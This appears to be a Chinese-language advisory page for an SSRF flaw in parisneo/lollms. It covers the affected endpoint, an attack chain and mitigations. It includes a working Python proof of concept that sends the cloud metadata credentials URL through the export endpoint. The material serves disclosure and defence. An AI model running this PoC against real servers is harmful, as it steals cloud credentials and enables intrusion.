CVE-2026-0560 CVSS 7.5 高危

CVE-2026-0560：parisneo/lollms存在SSRF漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0560

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

parisneo/lollms

漏洞概述

parisneo/lollms 2.2.0之前版本存在服务端请求伪造（SSRF）漏洞。攻击者可利用`/api/files/export-content`端点，通过未验证的URL参数诱导服务器向内部网络或云元数据服务发起请求。此漏洞可能导致敏感信息泄露、内网端口扫描，并在特定条件下引发远程代码执行，严重威胁服务器安全。

技术细节

该漏洞的根源在于`backend/routers/files.py`文件中的`_download_image_to_temp()`函数缺乏对用户输入URL的有效校验机制。当攻击者向应用程序的`/api/files/export-content`端点发送特制请求时，可以将恶意构造的URL（例如指向内网敏感服务或云元数据服务`169.254.169.254`的地址）作为参数传递。由于服务端未对请求目标的IP地址或协议进行白名单限制，应用程序会盲目地代为发起HTTP请求。这使得攻击者能够绕过网络边界防御，探测内部开放端口，窃取云厂商的元数据凭证，甚至结合其他漏洞实现远程代码执行，对内网安全构成严重威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标服务器运行的是parisneo/lollms且版本低于2.2.0，确认存在SSRF漏洞。

STEP 2

2. 构造恶意请求

攻击者构造包含恶意URL（如云元数据服务地址 http://169.254.169.254）的HTTP POST请求，指向`/api/files/export-content`端点。

STEP 3

3. 服务端请求伪造

服务器接收到请求后，`_download_image_to_temp()`函数未做校验，直接代为向攻击者指定的内部地址发起HTTP请求。

STEP 4

4. 获取敏感数据

攻击者利用服务器返回的响应内容，获取内网敏感信息、端口状态或云服务临时凭证，为进一步入侵做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, malicious_url):
    """
    PoC for CVE-2026-0560 SSRF in parisneo/lollms
    """
    endpoint = f"{target_url}/api/files/export-content"
    headers = {"Content-Type": "application/json"}
    
    # Payload attempting to access AWS metadata
    payload = {
        "url": malicious_url,  # e.g., http://169.254.169.254/latest/meta-data/
        "path": "test.jpg"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost:9600" # Replace with actual target
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

影响范围

parisneo/lollms < 2.2.0

防御指南

临时缓解措施

在未升级修复前，建议在防火墙或安全组中严格限制服务器的出站流量，禁止服务器访问内网敏感网段及公网非业务必要地址。同时，可通过WAF等设备对`/api/files/export-content`接口的请求参数进行过滤，拦截包含内网IP或元数据IP的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表